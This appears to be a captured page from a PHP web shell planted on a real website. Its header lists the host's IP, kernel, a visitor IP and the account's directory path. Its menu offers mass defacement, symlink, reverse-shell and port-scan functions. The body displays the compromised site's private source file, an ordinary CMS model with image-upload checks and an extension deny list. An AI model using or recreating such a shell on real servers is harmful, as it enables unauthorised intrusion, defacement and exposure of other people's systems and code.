Tul xxx Tul
User / IP
:
216.73.216.159
Host / Server
:
45.84.207.204 / aircan.me
System
:
Linux lt-bnk-web1726.main-hosting.eu 5.14.0-611.36.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Mar 3 11:23:52 EST 2026 x86_64
Command
|
Upload
|
Create
Mass Deface
|
Jumping
|
Symlink
|
Reverse Shell
Ping
|
Port Scan
|
DNS Lookup
|
Whois
|
Header
|
cURL
:
/
home
/
u931257429
/
domains
/
aircan.me
/
public_html
/
construcciones
/
admin
/
app
/
Models
/
Viewing: Work.php
<?php class Work extends BaseModel { protected string $table = 'works'; protected array $fillable = [ 'title', 'description', 'image_path', 'location', 'category', 'is_featured', 'status', 'order_position', 'updated_at', 'deleted_at', ]; public function getAll(): array { $statement = $this->db->query('SELECT * FROM works WHERE deleted_at IS NULL ORDER BY order_position ASC, created_at DESC'); return $statement->fetchAll(); } public function getPublic(): array { $statement = $this->db->query("SELECT * FROM works WHERE deleted_at IS NULL AND status = 'activo' ORDER BY is_featured DESC, order_position ASC, created_at DESC"); return $statement->fetchAll(); } public function getById(int $id): ?array { $statement = $this->db->prepare('SELECT * FROM works WHERE id = :id AND deleted_at IS NULL LIMIT 1'); $statement->execute(['id' => $id]); return $statement->fetch() ?: null; } public function createWork(array $data): int { return $this->create($data); } public function updateWork(int $id, array $data): bool { $data['updated_at'] = date('Y-m-d H:i:s'); return $this->update($id, $data); } public function softDelete(int $id): bool { return $this->update($id, ['deleted_at' => date('Y-m-d H:i:s'), 'status' => 'inactivo']); } public function toggleStatus(int $id): bool { $work = $this->getById($id); if (!$work) return false; return $this->update($id, ['status' => $work['status'] === 'activo' ? 'inactivo' : 'activo']); } public function categories(): array { $statement = $this->db->query("SELECT DISTINCT category FROM works WHERE deleted_at IS NULL AND category IS NOT NULL AND category != '' ORDER BY category ASC"); return array_column($statement->fetchAll(), 'category'); } public function uploadImage(array $file, ?string $oldFile = null): ?string { if (empty($file['name']) || ($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) { return null; } if (!$this->validImage($file)) { return null; } $extensions = ['image/jpeg' => 'jpg', 'image/png' => 'png', 'image/webp' => 'webp']; $mime = mime_content_type($file['tmp_name']); $filename = 'work_' . date('YmdHis') . '_' . bin2hex(random_bytes(6)) . '.' . $extensions[$mime]; $directory = ROOT_PATH . '/storage/uploads/works'; if (!is_dir($directory)) { mkdir($directory, 0775, true); } $destination = $directory . '/' . $filename; if (!move_uploaded_file($file['tmp_name'], $destination)) { return null; } $this->deleteOldFile($oldFile); return 'storage/uploads/works/' . $filename; } public function validImage(array $file): bool { if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) { return false; } $extension = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION)); if (in_array($extension, ['php', 'js', 'html', 'svg', 'phtml', 'phar'], true)) { return false; } return in_array(mime_content_type($file['tmp_name']), ['image/jpeg', 'image/png', 'image/webp'], true); } private function deleteOldFile(?string $path): void { if (!$path) return; $target = realpath(ROOT_PATH . '/' . ltrim($path, '/')); $base = realpath(ROOT_PATH . '/storage/uploads/works'); if ($target && $base && str_starts_with($target, $base) && is_file($target)) { unlink($target); } } }
Coded With 💗 by
0x6ick